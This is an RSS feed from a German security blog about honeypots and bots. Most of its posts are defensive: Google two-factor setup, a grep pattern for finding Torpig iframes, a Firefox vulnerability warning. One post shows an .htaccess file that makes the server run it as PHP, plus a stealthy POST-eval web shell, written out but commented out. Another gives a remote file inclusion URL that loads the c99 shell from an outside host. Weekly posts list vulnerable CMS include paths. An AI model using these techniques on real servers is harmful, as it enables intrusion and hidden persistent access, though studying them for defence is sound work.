<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>BotNetzProvider.de &#187; Sicherheit</title>
	<atom:link href="http://blog.botnetzprovider.de/category/sicherheit/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.botnetzprovider.de</link>
	<description>Ein Security Blog über Honig-Töpfe (honeypots) und Bots</description>
	<lastBuildDate>Sat, 19 Nov 2011 11:38:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Zwei Wege-Authentifizierung für das Google-Konto</title>
		<link>http://blog.botnetzprovider.de/2011/10/21/zwei-wege-authentifizierung-fur-das-google-konto/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=zwei-wege-authentifizierung-fur-das-google-konto</link>
		<comments>http://blog.botnetzprovider.de/2011/10/21/zwei-wege-authentifizierung-fur-das-google-konto/#comments</comments>
		<pubDate>Fri, 21 Oct 2011 12:33:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://blog.botnetzprovider.de/?p=1008</guid>
		<description><![CDATA[Die Google-Dienste, wie zum Beispiel Google+,Google Mail oder Google Texte und Tabellen, werden von viele Benutzer heutzutage immer häufiger benutzt. Für viele User ist das Google Konto zentrale Sammelstelle für sämtliche E-Mail Accounts und Dokumentenverwaltung. Gerne werden auch private Bilder bei Google Picasa hinterlegt. Diese Dienste sind nur mit einem Passwort gesichert und sollte dieses [...]]]></description>
			<content:encoded><![CDATA[<p>Die <a href="http://www.google.de/options/">Google-Dienste</a>, wie zum Beispiel Google+,Google Mail oder Google Texte und Tabellen, werden von viele Benutzer heutzutage immer häufiger benutzt. Für viele User ist das Google Konto zentrale Sammelstelle für sämtliche E-Mail Accounts und Dokumentenverwaltung. Gerne werden auch private Bilder bei Google Picasa hinterlegt. </p>
<p>Diese Dienste sind nur mit einem Passwort gesichert und sollte dieses einmal in die falschen Hände geraten, ist der Zugriff auf das Google-Konto nicht mehr möglich. Persönliche Daten,Bilder und Dokumente sind nun verloren. </p>
<p>Google hat dafür eine Lösung entwickelt, mit der man eine zusätzliche Sicherheitsebene erhält. Die Zwei-Wege-Authentifizierung.</p>
<p>Heutzutage hat fast jedes größere Unternehmen, eine solche Ebene zur Absicherung eingerichtet. In den meisten Fällen wird ein <a href="http://de.wikipedia.org/wiki/SecurID">"RSA-Token"</a> verwendet. Nach der Eingabe des Benutzernamen und Passwort wird noch zusätzlich ein Sicherheitscode, meist in Form einer Zahlenkombination verlangt. Diese zusätzliche Form von Sicherheit bzw. Sicherheitsebene kann nur mit sehr viel Aufwand umgangen werden. <img alt="RSA-Token" src="http://upload.wikimedia.org/wikipedia/commons/8/8f/RSA_SecurID_SID800.jpg" title="RSA-Token" class="aligncenter" width="450" height="250" /></p>
<p>Google hat für seine Benutzer ein ähnliches Verfahren entwickelt. Mit Hilfe des Smart-Phones wird das App Google-Authenticator heruntergeladen und mit dem Google-Konto verknüpft. Eine ausführliche Anleitung auf Deutsch findet man hier:</p>
<p><a href="http://www.google.de/support/accounts/bin/static.py?page=guide.cs&#038;guide=1056283&#038;topic=1056284" >Erste Schritte bei der Bestätigung in zwei Schritten </a></p>
<p>Bei dem einloggen in sein Google-Account, wird nun ein Bestätigungscode zusätzlich zu dem Passwort verlangt. Der Bestätigungscode wird alle 45 Sekunden generiert und kann vom Smart-Phone abgelesen werden. <strong>Wichtig:</strong> Nach der Aktivierung der 2 Wege Authentifizierung muss man immer zusätzlich den Bestätigungscode mit angeben, sonst kann man sich nicht mehr in sein Google-Konto einloggen. </p>
<p><img alt="Google-Authentificator" src="http://2.bp.blogspot.com/-y2s0s4iI95s/TX7uJ9zeizI/AAAAAAAAAjM/gLim4FVVaIo/s1600/android-google-authenticator-screenshot.png" title="Google-Authentificator" class="aligncenter" width="280" height="454" /></p>
<p>Des weiteren kann man nun auch "Einmal Passwörter" für einzelnen Google-Dienste vergeben. Ein klassisches Beispiel ist, dass man seinem Smart-Phone ein "Einmal Passwort" vergibt. Im Falle, dass man sein Handy verliert, kann man nun aus seinem Google-Konto heraus die Rechte für das Handy entziehen (revoke). Damit erhält der Dieb des Handys KEIN Zugriff mehr auf das Google-Konto. </p>
<p>Die Anleitung für "Einmal Passwörter" findest du hier: <a href="http://www.google.de/support/accounts/bin/static.py?page=guide.cs&#038;guide=1056283&#038;topic=1056286">Anleitung</a></p>
<p><strong>!!! WICHTIG !!!</strong><br />
Bei der Aktivierung der 2 Wege Authentifizierung bietet Google einem 10 Notfall-Bestätigungscodes an. Diese müssen an einem Sicheren Ort aufbewahrt werden, da man im Verlustfall des Handys keine weiteren Bestätigungscodes generieren kann. Auch sollte man das Zusenden von Bestätigungscodes via SMS auf ein anderes Handy/Festnetz aktivieren, so dass man zur Not sich immer noch in sein Google-Konto einloggen kann. </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2011/10/21/zwei-wege-authentifizierung-fur-das-google-konto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP-Shell in .htaccess Datei</title>
		<link>http://blog.botnetzprovider.de/2011/06/01/php-shell-in-htaccess-datei/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=php-shell-in-htaccess-datei</link>
		<comments>http://blog.botnetzprovider.de/2011/06/01/php-shell-in-htaccess-datei/#comments</comments>
		<pubDate>Wed, 01 Jun 2011 13:49:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[PHP-Shell]]></category>
		<category><![CDATA[php-shell]]></category>

		<guid isPermaLink="false">http://blog.botnetzprovider.de/?p=921</guid>
		<description><![CDATA[Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers. Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" [...]]]></description>
			<content:encoded><![CDATA[<p>Vor kurzem habe ich einen Artikel von <a href="http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html">Eldar Marcussen</a> gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine <a href="http://de.wikipedia.org/wiki/Htaccess">".htaccess" </a>Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers. </p>
<p>Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags <?php ... ?> ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten. </p>
<p>Beispiel .htaccess:</p>
<pre class='brush: bash'>
# Orginal von http://www.justanotherhacker.com
# umgeschrieben von http://blog.botnetzprovider.de
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Apache sagen bitte die .htaccess Datei als PHP interpretieren.
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #
</pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2011/06/01/php-shell-in-htaccess-datei/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Backscatter: Wie kann ich meinen Server Testen? (Qmail, Postfix mit Plesk)</title>
		<link>http://blog.botnetzprovider.de/2011/01/25/backscatter-wie-kann-ich-meinen-server-testen-qmail-postfix-mit-plesk/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=backscatter-wie-kann-ich-meinen-server-testen-qmail-postfix-mit-plesk</link>
		<comments>http://blog.botnetzprovider.de/2011/01/25/backscatter-wie-kann-ich-meinen-server-testen-qmail-postfix-mit-plesk/#comments</comments>
		<pubDate>Tue, 25 Jan 2011 15:52:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[plesk]]></category>
		<category><![CDATA[postfix]]></category>
		<category><![CDATA[qmail]]></category>

		<guid isPermaLink="false">http://blog.botnetzprovider.de/?p=796</guid>
		<description><![CDATA[Ich bekomme in diesen Tagen immer mehr Anfragen zu Backscatter Problematiken. Sollten Sie auch eine E-Mail von Ihrem Hoster bekommen haben, der Sie darauf hinweist, dass Ihr Server “backscattert” einfach weiter lesen… [LINK]]]></description>
			<content:encoded><![CDATA[<p>Ich bekomme in diesen Tagen immer mehr Anfragen zu Backscatter Problematiken.<br />
Sollten Sie auch eine E-Mail von Ihrem Hoster bekommen haben, der Sie darauf hinweist, dass Ihr Server “backscattert” einfach weiter lesen… <a href="http://blog.botnetzprovider.de/backscatter-wie-kann-ich-meinen-server-testen-qmail-postfix-mit-plesk/">[LINK]</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2011/01/25/backscatter-wie-kann-ich-meinen-server-testen-qmail-postfix-mit-plesk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>KW 29 – Top 10 – RFI Patterns</title>
		<link>http://blog.botnetzprovider.de/2009/07/14/kw-29-%e2%80%93-top-10-%e2%80%93-rfi-patterns/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=kw-29-%25e2%2580%2593-top-10-%25e2%2580%2593-rfi-patterns</link>
		<comments>http://blog.botnetzprovider.de/2009/07/14/kw-29-%e2%80%93-top-10-%e2%80%93-rfi-patterns/#comments</comments>
		<pubDate>Tue, 14 Jul 2009 11:01:46 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[RFI]]></category>

		<guid isPermaLink="false">http://blog.botnetzprovider.de/?p=515</guid>
		<description><![CDATA[/index.php?redir /phphtml.php?htmlclass_path /main.php?pagina //s_loadenv.inc.php?DOCUMENT_ROOT /photoalb/lib/static/header.php?set_menu /?news_id=43/encore/main.php?pagina /?news_id=43/encore/forumcgi/main.php?pagina /show.php?path //cropcanvas.php?cropimagedir /SQuery/lib/gore.php?libpath]]></description>
			<content:encoded><![CDATA[<p>/index.php?redir<br />
/phphtml.php?htmlclass_path<br />
/main.php?pagina<br />
//s_loadenv.inc.php?DOCUMENT_ROOT<br />
/photoalb/lib/static/header.php?set_menu<br />
/?news_id=43/encore/main.php?pagina<br />
/?news_id=43/encore/forumcgi/main.php?pagina<br />
/show.php?path<br />
//cropcanvas.php?cropimagedir<br />
/SQuery/lib/gore.php?libpath</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/07/14/kw-29-%e2%80%93-top-10-%e2%80%93-rfi-patterns/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>torpig/mebroot drive-by downloads erkennen via (z)grep</title>
		<link>http://blog.botnetzprovider.de/2009/05/13/torpigmebroot-drive-by-downloads-erkennen-via-zgrep/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=torpigmebroot-drive-by-downloads-erkennen-via-zgrep</link>
		<comments>http://blog.botnetzprovider.de/2009/05/13/torpigmebroot-drive-by-downloads-erkennen-via-zgrep/#comments</comments>
		<pubDate>Wed, 13 May 2009 18:04:07 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[Skripte]]></category>
		<category><![CDATA[grep]]></category>
		<category><![CDATA[torpig]]></category>

		<guid isPermaLink="false">http://blog.botnetzprovider.de/?p=406</guid>
		<description><![CDATA[Für alle die Ihren Webspace durchsuchen wollen nach bösartigen IFRAMES hier ein kleiner String: Dieser String ist gut für die meisten verschlüsselten Torpig/Mebroot IFRAMES. SSH Zugang wird natürlich vorausgesetzt. Im root Verzeichnis ausführen. $ (z)grep -Rl 'function .(.){r="";for(i=0;i&#38;lt;..length;i++){if(..charAt(i)=="."){..="%"}else{..=..cha' * Natürlich keine Gewähr auf 100% Trefferquote, da es sich dabei um einen statistischen Link handelt. Ich [...]]]></description>
			<content:encoded><![CDATA[<p>Für alle die Ihren Webspace durchsuchen wollen nach bösartigen IFRAMES hier ein kleiner String:<br />
Dieser String ist gut für die meisten verschlüsselten Torpig/Mebroot IFRAMES.<br />
SSH Zugang wird natürlich vorausgesetzt.<br />
Im root Verzeichnis ausführen.</p>
<p><code>$ (z)grep -Rl 'function .(.){r="";for(i=0;i&amp;lt;..length;i++){if(..charAt(i)=="."){..="%"}else{..=..cha' *</code></p>
<p>Natürlich keine Gewähr auf 100% Trefferquote, da es sich dabei um einen statistischen Link handelt. Ich habe aus 42 JavaScript IFRAMES dieses Pattern gebastelt. Grep oder zgrep müsst Ihr entscheiden, je nach Dateien.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/05/13/torpigmebroot-drive-by-downloads-erkennen-via-zgrep/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>KW 17 &#8211; Top 10 &#8211; RFI Patterns</title>
		<link>http://blog.botnetzprovider.de/2009/04/25/kw-17-top-10-rfi-patterns/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=kw-17-top-10-rfi-patterns</link>
		<comments>http://blog.botnetzprovider.de/2009/04/25/kw-17-top-10-rfi-patterns/#comments</comments>
		<pubDate>Sat, 25 Apr 2009 16:22:01 +0000</pubDate>
		<dc:creator>amb</dc:creator>
				<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[RFI]]></category>
		<category><![CDATA[RFI pattern]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=369</guid>
		<description><![CDATA[//modules/xfsection/modify.php?dir_module= //index.php?option=com_dbquery&#38;Itemid=&#38;mosConfig_absolute_path= /binaries/log/errors.php?error= //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= /?sourcedir= //components/com_flyspray/startdown.php?file= //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path= ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path= //include/write.php?dir=]]></description>
			<content:encoded><![CDATA[<p>//modules/xfsection/modify.php?dir_module=<br />
//index.php?option=com_dbquery&amp;Itemid=&amp;mosConfig_absolute_path=<br />
/binaries/log/errors.php?error=<br />
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=<br />
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=<br />
/?sourcedir=<br />
//components/com_flyspray/startdown.php?file=<br />
//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=<br />
///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=<br />
//include/write.php?dir=</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/04/25/kw-17-top-10-rfi-patterns/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox Exploit &#8211; Risk: high</title>
		<link>http://blog.botnetzprovider.de/2009/03/28/firefox-exploit-risk-high/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=firefox-exploit-risk-high</link>
		<comments>http://blog.botnetzprovider.de/2009/03/28/firefox-exploit-risk-high/#comments</comments>
		<pubDate>Fri, 27 Mar 2009 22:12:43 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[firefox]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=327</guid>
		<description><![CDATA[Art: XSL parsing remote memory corruption poc Alle die Firefox in den folgenden Versionen nutzen Mozilla Firefox 3.0.7 Mozilla Firefox 3.0.6 Mozilla Firefox 3.0.5 Mozilla Firefox 3.0.4 Mozilla Firefox 3.0.3 Mozilla Firefox 3.0.2 Mozilla Firefox 3.0.1 Mozilla Firefox 3.0 !Windows und Linux User! sind gefährdet. Erste Infos gab es dazu auf mailw0rm. Laut Firefox wird [...]]]></description>
			<content:encoded><![CDATA[<pre>Art: XSL parsing remote memory corruption poc</pre>
<p>Alle die Firefox in den folgenden Versionen nutzen</p>
<p>Mozilla Firefox 3.0.7<br />
Mozilla Firefox 3.0.6<br />
Mozilla Firefox 3.0.5<br />
Mozilla Firefox 3.0.4<br />
Mozilla Firefox 3.0.3<br />
Mozilla Firefox 3.0.2<br />
Mozilla Firefox 3.0.1<br />
Mozilla Firefox  3.0</p>
<p><strong>!Windows und Linux User!</strong><br />
<strong>sind gefährdet. </strong></p>
<p>Erste Infos gab es dazu auf <a href="http://milw0rm.com/exploits/8285">mailw0rm.</a></p>
<p>Laut Firefox wird es erst am 01.April ein Fix dazu geben.</p>
<p>Wie kann ich davor schützen:<br />
1. NoScript installieren (Ein AddOn für Firefox) <a href="http://noscript.net/">http://noscript.net/</a><br />
Keine Skripte ausführen bis ein Fix von Firefox herausgegeben wurde.</p>
<p>Offizielle Infos von Firefox <a href="http://blog.mozilla.com/security/2009/03/26/cansecwest-2009-pwn2own-exploit-and-xsl-transform-vulnerability/">HIER</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/03/28/firefox-exploit-risk-high/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wenn Facebook.com zu einem Botnetz wird</title>
		<link>http://blog.botnetzprovider.de/2009/03/18/wenn-facebookcom-zu-einem-botnetz-wird/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=wenn-facebookcom-zu-einem-botnetz-wird</link>
		<comments>http://blog.botnetzprovider.de/2009/03/18/wenn-facebookcom-zu-einem-botnetz-wird/#comments</comments>
		<pubDate>Wed, 18 Mar 2009 03:10:02 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Botnetz]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=296</guid>
		<description><![CDATA[Man hat festgestellt, dass man Facebook.com in ein sehr großes und mächtiges Botnetz umwandeln kann. Da es Usern möglich ist eigene Scripte (z.B. MafiaWars, etc) in Facebook.com einzubinden, ist es ein relativ einfach bösartige Tools zu entwerfen. Anbei findet ihr ein Beispielszenario wie so etwas aussehen könnte. Also seit vorsichtig was Ihr in Facebook.com aktiviert [...]]]></description>
			<content:encoded><![CDATA[<p>Man hat festgestellt, dass man <a href="http://www.facebook.com" target="_blank">Facebook.com</a> in ein sehr großes und mächtiges Botnetz umwandeln kann.<br />
Da es Usern möglich ist eigene Scripte (z.B. MafiaWars, etc) in <a href="http://Facebook.com">Facebook.com</a> einzubinden, ist es ein relativ einfach bösartige Tools zu entwerfen.</p>
<p><!-- wp_ad_camp_1 --><br />
<strong></strong><br />
Anbei findet ihr ein Beispielszenario wie so etwas aussehen könnte.</p>
<p>Also seit vorsichtig was Ihr in <a href="http://Facebook.com" target="_blank">Facebook.com</a> aktiviert und installiert.<strong><br />
</strong></p>
<p><strong>Hier das Beispielszenario zum downloaden:</strong> <a href="http://blog.botnetzprovider.de/wp-content/uploads/2009/03/facebotisc08.pdf">facebotisc08</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/03/18/wenn-facebookcom-zu-einem-botnetz-wird/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>KW 12 &#8211; Top 10 &#8211; RFI Patterns</title>
		<link>http://blog.botnetzprovider.de/2009/03/17/kw-12-rfi-patterns/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=kw-12-rfi-patterns</link>
		<comments>http://blog.botnetzprovider.de/2009/03/17/kw-12-rfi-patterns/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 12:21:49 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[RFI]]></category>
		<category><![CDATA[RFI Patterns]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=266</guid>
		<description><![CDATA[Neue RFI Patterns //?path%5Bdocroot%5D= /rfi//?path%5Bdocroot%5D= //includes/mailaccess/pop3.php?CONFIG[pear_dir]= //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= //ktmllite/includes/ktedit/toolbar.php?dirDepth= //atom.php5?page= /rfi//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= /errors.php?error= /rfi/includes/mailaccess/pop3.php?CONFIG[pear_dir]= Bald wird der RFI Scanner zum download bereit stehn.]]></description>
			<content:encoded><![CDATA[<p><!-- wp_ad_camp_1 --></p>
<h3>Neue RFI Patterns</h3>
<p>//?path%5Bdocroot%5D=<br />
/rfi//?path%5Bdocroot%5D=<br />
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=<br />
//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=<br />
//ktmllite/includes/ktedit/toolbar.php?dirDepth=<br />
//atom.php5?page=<br />
/rfi//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=<br />
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=<br />
/errors.php?error=<br />
/rfi/includes/mailaccess/pop3.php?CONFIG[pear_dir]=</p>
<p><!-- wp_ad_camp_2 --></p>
<h3><strong>Bald wird der RFI Scanner zum download bereit stehn.</strong></h3>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/03/17/kw-12-rfi-patterns/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Webserver Hacken (remote file inclusion) c99</title>
		<link>http://blog.botnetzprovider.de/2009/03/02/webserver-hacken-remote-file-inclusion-c99-php-shell/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=webserver-hacken-remote-file-inclusion-c99-php-shell</link>
		<comments>http://blog.botnetzprovider.de/2009/03/02/webserver-hacken-remote-file-inclusion-c99-php-shell/#comments</comments>
		<pubDate>Mon, 02 Mar 2009 07:54:45 +0000</pubDate>
		<dc:creator>mcm</dc:creator>
				<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[hacken]]></category>
		<category><![CDATA[webserver hacken]]></category>

		<guid isPermaLink="false">http://botnetzprovider.de/blog/?p=176</guid>
		<description><![CDATA[Remote File Inclusion - c99 php shell Ich denke mal nicht das ich noch groß über das Thema sprechen muss, was genau eine Remote File Inclusion ist. Für alle die sich damit noch nicht auskennen sollten Wikipedia.de hat einen kurzen Artikel darüber HIER Daher will ich mich heute mit der wohl am bekanntesten "PHP SHELL" [...]]]></description>
			<content:encoded><![CDATA[<h3>Remote File Inclusion - c99 php shell</h3>
<p>Ich denke mal nicht das ich noch groß über das Thema sprechen muss, was genau eine Remote File Inclusion ist.<br />
Für alle die sich damit noch nicht auskennen sollten Wikipedia.de hat einen kurzen Artikel darüber <a title="Remote File Inclusion" href="http://en.wikipedia.org/wiki/Remote_File_Inclusion" target="_blank">HIER</a></p>
<p>Daher will ich mich heute mit der wohl am bekanntesten <a title="C99" href="http://botnetzprovider.de/blog/wp-content/uploads/2009/03/c99.txt" target="_blank">"PHP SHELL" (c99) </a>*beschäftigen.<br />
Es ist natürlich verständlich, dass ich den Quellcode der c99 PHP Shell ein wenig bearbeiten musste, damit man diese<br />
nicht sofort benutzen kann.</p>
<p>Zunächst einmal ist zu sagen, diese Shell muss nicht unbedingt auf dem eigenen Webserver liegen um genutzt zu werden.<br />
Es reicht wenn diese auf einem anderen Webserver in reiner Textform abgelegt ist.</p>
<p><strong>Ein klassisches Angriffsmuster sieht wie folgt aus:</strong></p>
<p>http://der.zu.hackende.server.de/ungeschütze.variable.php?variable=http://pfad.zur.phpShell.de/c99</p>
<p>Wenn dieser Angriff erfolgreich war, wird folgendes Angezeigt:<a title="c99" href="http://botnetzprovider.de/blog/wp-content/uploads/2009/03/c99.jpg" target="_blank"> (Beispiel) </a></p>
<p>Mit dieser nun integrierten Shell, kann man nun den gesamten Webserver steuern.</p>
<p><strong>Folgendes ist mit diesem Tool möglich:</strong></p>
<ul>
<li>FTP-Upload</li>
<li>Brute Force Attacken</li>
<li>Upload Files</li>
<li>SQL</li>
<li>Webserver Informationen anzeigen</li>
</ul>
<p><strong>Wie kann ich dem ganzen vorbeugen:</strong></p>
<p>1. Halten Sie Ihren Server und die Software (Joomla,etc) immer auf dem aktuellsten Stand.<br />
2. Überprüfen Sie öfters die Webserver Logdateien auf ungewöhnliche Einträge.</p>
<p>*leider musste ich die modifizierte Shell offline nehmen. Wurde bei einigen AntiViren Hersteller "blacklisted" <img src='http://blog.botnetzprovider.de/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.botnetzprovider.de/2009/03/02/webserver-hacken-remote-file-inclusion-c99-php-shell/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

